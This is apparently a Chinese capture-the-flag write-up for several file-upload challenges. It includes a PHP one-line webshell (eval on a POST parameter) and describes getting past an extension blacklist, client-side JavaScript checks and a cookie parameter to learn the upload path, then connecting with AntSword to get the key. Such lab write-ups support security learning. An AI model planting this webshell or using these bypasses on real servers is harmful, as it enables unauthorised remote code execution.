第一题
很熟悉的文件上传界面,尝试上传一句话木马文件<?php @eval($_POST['cmd']);?>,发现上传失败有限制,那么应该是黑名单限制
抓个包,将后缀改成特殊后缀名(php5,Php之类),而后用蚁剑连接找到key文件即可
第二题(这题还没有完全搞懂cookie参数,搞懂再补回)
看到蓝色字体提示根目录?不如访问一下index.php
登录界面(应该就是文件上传界面吧)?扫描?那不如用御剑扫描一下
看到admin/upload1.php 那就浅浅访问一下upload1.php呗
确定后看到界面马上跳转到upload2.php,那么upload1.php肯定有猫腻嘿嘿
浅浅抓个包
发现upload1是有JS校验的(关掉JS上传文件没什么响应,突破点不是这里)
发现cookie的参数有蹊跷,将cookie的参数改为文件的上传地址upload_file.php
然后发现了上传文件的存储方式还有命名方式
返回前面禁用JS上传文件界面,抓包,然后go
简洁明了,即上传路径为 uploadfile/20220403_939a9a13061d5333_1.php
用蚁剑连接找到key文件就🆗啦
也是第二题(不理解为什么会有两道第二题啊强迫症要压不住啦)
又是熟悉的文件上传界面哼哼,随便上传个看看
查看页面源代码
发现有JS校验
可以通过禁用JS,也可以通过 将一句话木马文件改成可允许上传的文件后缀名然后抓包绕过本地JS校验,改回php即可
一如既往用蚁剑连接找到key文件即可